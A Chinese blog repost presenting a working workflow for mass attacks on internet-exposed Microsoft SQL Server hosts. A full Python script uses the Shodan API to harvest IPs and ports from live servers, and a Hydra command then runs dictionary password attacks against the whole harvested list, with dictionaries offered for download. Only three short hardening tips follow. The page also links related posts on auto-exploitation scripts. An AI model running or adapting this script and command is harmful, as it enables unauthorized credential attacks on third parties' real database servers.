基于Shodan Python库的批量攻击实践 撒旦网

最新推荐文章于 2024-06-05 13:45:00 发布
最新推荐文章于 2024-06-05 13:45:00 发布
阅读量1.3k 收藏 1
点赞数 1
原文链接:https://blog.csdn.net/whatday/article/details/84643977
版权

拜读了xiaix关于Shodan的全面介绍:《Shodan新手入坑指南》,受益匪浅。SQL Server的弱口令入侵案例层出不穷,利用工具也大量存在,本文以MSSQL服务器为切入点,以解决批量目标发现为目标,介绍了一种基于Shodan Python库的攻击方法。希望能给有类似需求的同学提供参考。

0×01 基本思路

首先利用Shodan的Python库获取并实时处理MSSQL服务器IP及1434端口Banner,得到IP和MSSQL连接端口的组合列表;然后利用Hydra进行字典口令攻击。

SQL Server服务使用两个端口:TCP-1433、UDP-1434。其中1433用于供SQL Server对外提供服务,1434用于向请求者返回SQL Server使用了哪个TCP/IP端口。    —— 百度百科-1433端口

0×02 实现脚本

实现过程详见脚本中的注释

# -- coding:utf-8 --
# Python v2.7.10
# MSSQL.py
# Written by Gaearrow

import shodan
import sys

# API_KEY
API_KEY = "YOUR_API_KEY"
query = "product:\"Microsoft SQL Server\""

# 处理输入
if len(sys.argv) != 3:
    print 
    print 'Usage: MSSQL.py <page start:1,2...> <page end:1,2...>'
    sys.exit(1)
pagestart = int(sys.argv[1])
pageend = int(sys.argv[2])

try:
    # 初始化输出文件
    ofilename = 'page'+str(pagestart)+'to'+str(pageend)
    ofilesrc = ofilename+'_src.txt'
    ofileip = ofilename+'_ip.txt'
    fsrc = open(ofilesrc,'w')
    fip = open(ofileip,'w')

    # 统计变量
    numofport = 0
    numofnoport = 0
    rstlist = 0
    
    # 逐页检索
    api = shodan.Shodan(API_KEY)
    rsttotal = api.count(query)
    maxpage = (rsttotal['total']+99)/100
    if pageend > maxpage:
        pageend = maxpage
    for page in range(pagestart,pageend+1):
        result = api.search(query,page)
        for mssql in result['matches']:
            # 从Banner中解析MSSQL的连接端口
            ## 删除换行
            ip = mssql['ip_str'].strip('\n')
            ## Ignore IPv6
            if len(ip) > 15:
                continue
            ## 跳过特殊字符
            banner = mssql['data'][3:]
            ## 检查Banner
            if banner.find('ServerName') < 0:
                continue
            pos = banner.find('tcp;')
            if pos > 0:
                strlist = banner[pos:].split(';')
                if strlist[1].find('np') < 0:
                    ### tcp;1234;np;..
                    ipport = ip+':'+strlist[1]
                    numofport = numofport + 1
                else:
                    ### tcp;np;..
                    ipport = ip+":1433"
                    numofnoport = numofnoport + 1
            else:
                ### no 'tcp;'
                ipport = ip+":1433"
                numofnoport = numofnoport + 1

            print >>fip,ipport
            print >>fsrc,mssql['ip_str']
            print >>fsrc,mssql['data'][3:]
            rstlist = rstlist + 1

    # 打印统计信息
    print >>fsrc,'==================================='
    print >>fsrc,'Shodan Summary Information'
    print >>fsrc,'Query : ', query
    print >>fsrc,'Total Results : ', rsttotal['total']
    print >>fsrc,'List  Results : ', rstlist
    print >>fsrc,'Page  Start   : ', pagestart
    print >>fsrc,'Page  End     : ', pageend
    print >>fsrc,'Port  Assigned   : ',numofport
    print >>fsrc,'Port  Unassigned : ',numofnoport
    print >>fsrc,'==================================='

except Exception as e:
    print 'Error: %s' % e
    sys.exit(1)

fsrc.close()
fip.close()

0×03 执行示例

执行环境

root@kali2:~/app/mssqlnew# uname -a
Linux kali2 4.0.0-kali1-686-pae #1 SMP Debian 4.0.4-1+kali2 (2015-06-03) i686 GNU/Linux
root@kali2:~/app/mssqlnew# python -V
Python 2.7.9

获取地址端口组合列表

root@kali2:~/app/mssqlnew# python MSSQL.py 1 10

page1to10_src.txt

src.png

summary.png

page1to10_ip.txt

iplist.png

hydra字典攻击

攻击耗时及成功率与用户、口令字典有紧密关系,网络带宽也影响速度。

root@kali2:~/app/mssqlnew# hydra -L sqluser.dic -P sqlpass.dic -t 30 -M page1to10_ip.txt mssql

0×04 安全建议

设置MSSQL仅限本地连接

修改MSSQL的默认连接端口

分级配置各类数据库用户权限

脚本及字典下载地址:Github Download

 

whatday
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Pythonshodan模块的使用
谢公子的博客
11-13 6764
关于shodan的安装和使用,传送门——&gt; 渗透测试之Shodan的安装和使用 常用 Shodan 库函数 shodan.Shodan(key) :初始化连接API Shodan.count(query, facets=None):返回查询结果数量 Shodan.host(ip, history=False):返回一个IP的详细信息 Shodan.ports():返回Shodan可...
shodan python
devil8123665的博客
04-28 947
为了开始使用ShodanPython库,首先要确保你已经收到了API密钥。一旦完成,就可以通过以下方法来安装库: (注:API密钥可以通过注册shodan账户获得) $ easy_install shodan 升级到最新版本: $ easy_install -U shodan 由于向后兼容的特性,所以更新库始终是安全的。通常,库的新版本仅仅意味着有新的方法/特性可用。 连接到api 我们的代码中需要做的第一件事是初始化API对象: import shodan SHODAN_API_KEY
shodan搜索引擎怎么用,shodan可以搜索什么
最新发布
隔壁王叔的博客
06-05 631
shodan搜索引擎怎么用,shodan可以搜索什么
Python-Shodan使用介绍
qq_43776408的博客
05-27 923
Python-shodan初始化API Key kali中输入ipython 这是一种交互式的编程 写一行判断一行,一步一个脚印 我喜欢 第二行是定义一个API的key Python-shodan的search方法 返回阿帕奇主机的数量 Python-shodan的IP查询 查询IP所在的国家 shodan查询代码 pip install numpy -i http://pypi.douban.com/simple/ --trusted-host pypi.douban.com ...
Python调用 shodan API接口
qq_45212655的博客
03-26 598
本篇我们将介绍Python调用shodan的api接口并拿取数据的方法。from shodan import Shodan api = Shodan('MY API KEY') # 扫描单个ip ipinfo = api.host('8.8.8.8') print(ipinfo)
特殊的搜索引擎以及Shodan
leofionn的博客
08-24 2754
https://www.zhihu.com/question/20251786 以及:https://www.shodan.io/ 什么是ShodanShodan是用于连接互联的设备的搜索引擎。络搜索引擎,例如Google和Bing,非常适合查找站。但是,如果您有兴趣测量哪些国家变得更加紧密,那该怎么办?或者,如果您想知道哪个版本的Microsoft IIS最受欢迎?或者您想找到恶...
shodan-python-master.zip
03-05
1. `setup.py`: 这是一个Python配置脚本,用于安装ShodanPython库到你的开发环境中。运行`python setup.py install`命令即可安装。 2. `shodan`文件夹:这是Shodan API的Python实现,包含必要的模块和类。主要的...
PyPI 官下载 | shodan-1.4.2.tar.gz
01-16
Shodan库是Python的一个第三方模块,它允许开发者通过API与Shodan服务进行交互,获取关于互联上的各种设备、服务器、物联设备等的信息。这个库可以帮助安全研究人员、系统管理员以及对络拓扑感兴趣的人发现...
PyPI 官下载 | shodan-1.6.0.tar.gz
01-29
`shodan-1.6.0.tar.gz` 是一个在PyPI上发布的压缩包文件,它包含了名为 `shodan` 的Python库的版本1.6.0。这个库主要用于通过Shodan API与互联设备进行交互,从而进行络搜索引擎的查询和分析。 **Shodan Python...
The official Python library for Shodan,shodan-python-master.zip
04-22
"shodan-python-master.zip" 是官方提供的Python库,允许开发者通过Python代码方便地与Shodan API进行交互。 Shodan Python库的核心功能主要包括: 1. **API接口调用**:库提供了与Shodan API交互的功能,允许...
第五节 Python-shodan使用介绍-01
09-15
然后,在 Python 代码中,使用 requests 库发送 GET 请求,携带 API Key,以便连接 Shodan API。 代码示例: ```python import requests api_key = "YOUR_API_KEY" url = "https://api.shodan.io/shodan/info" ...
文件包含批量攻击脚本
09-07
基础的文件包含,可以通过该脚本直接获取相应的flag,在awd中好用
Shodan使用教程说明书
11-23
压缩形式,压缩包内文件为pdf格式。leanpub.com上原价五美元的pdf电子教程文档,该文件名全称为:Complete Guide to Shodan.pdf。Shodan是一个在络安全方面十分实用的搜索引擎,学习这个搜索引擎的教程可以让你更方便快捷的了解络安全,并且shodan已经被很多安软件和络测试软件集成。
AWD批量拿分python脚本
05-12
根据上版本修改的,现场更好更改参数的版本,减少AWD比赛时的代码修改量,原始版本是上公有版本,个人觉得哪个版需要改的参数太多浪费了很多比赛时间,可以提前根据自己shell名称改好速度会更快
Python武器库开发-武器库篇之shodan-API使用(四十八)
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
01-23 830
它可以搜索和识别各种连接到互联的设备,包括服务器、路由器、摄像头、打印机等等。Shodan可以提供有关这些设备的信息,例如设备的IP地址、端口号、操作系统、开放的服务等等。Shodan的功能不仅限于搜索和发现设备,它还可以提供设备的详细信息,如设备的地理位置、厂商、软件版本等。使用Shodan,用户可以搜索特定类型的设备,如具有特定操作系统、开放特定端口、使用特定服务等的设备。替换为你在Shodan站上获取的API密钥。运行代码后,它将使用你提供的目标进行Shodan搜索,并输出搜索结果的相关信息。
Shodan新手使用指南
热门推荐
浮生若梦的专栏
12-05 5万+
什么是 Shodan? 首先,Shodan 是一个搜索引擎,但它与 Google 这种搜索址的搜索引擎不同,Shodan 是用来搜索络空间中在线设备的,你可以通过 Shodan 搜索指定的设备,或者搜索特定类型的设备,其中 Shodan 上最受欢迎的搜索内容是:webcam,linksys,cisco,netgear,SCADA等等。 那么 Shodan 是怎么工作的呢?Shodan 通过
[Shodan]使用Python API的环境准备及示例
BraveWinds B10G
03-06 1583
本文介绍Shodan提供的Python API开发环境基本配置过程及脚本示例。以上内容在官方说明文档中都有详细描述,如果想深入了解推荐前往以下链接查阅: Shodan:https://www.shodan.io Python API Document:https://shodan.readthedocs.io/en/latest/ 环境说明 OS: Kali GNU/Linux Rolling...
python攻击脚本实例-一键黑客工具:一个Python脚本搞定所有攻击操作
weixin_39745724的博客
11-11 3292
近期出现了可综合利用Shodan设备搜索引擎和Metasploit渗透测试工具的Python代码。该代码会用Shodan.io自动搜索有漏洞的在线设备,随后使用Metasploit的漏洞利用数据库劫持计算机和其他在线设备。只需点击运行,该脚本就会爬取互联,寻找可以攻击的脆弱主机(通常是因为没打补丁),并自动取得对这些主机的控制权。完全无需什么高端的黑客技术。本文福利:私信回复【PDF】可获取Py...
使用python利用FTP2.3.4的笑脸漏洞
单核CPU的小朋友的博客
03-22 1379
首先FTP是一个文件传输协议,而且FTP是一种明文的传输协议,通过WIreshark抓包能够直接获取到FTP协议的传输内容。 而在FTP2.3.4版本中,当用户名中存在:)的笑脸标志时,能够直接执行系统命令。 我们如果在CTF中遇到了FTP2.3.4版本号的服务,可以使用python进行批量攻击,那我们需要编写脚本来实现这个功能,同时我们最好是使用socket来实现和FTP服务的明文通信。这个过程和使用nc命令来测试络连通性是相同的。 而在python中,利用代码如下: import time impor
Shodan中文手册:从入门到精通
"Shodan中文手册是一本详细介绍了Shodan搜索引擎的使用和应用的手册,包括搜索语法、客户端命令行、API编程、工具插件和工控协议等多个方面。内容经过译者的增删改,并进行了实际测试和验证,适合渗透测试和络安全...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值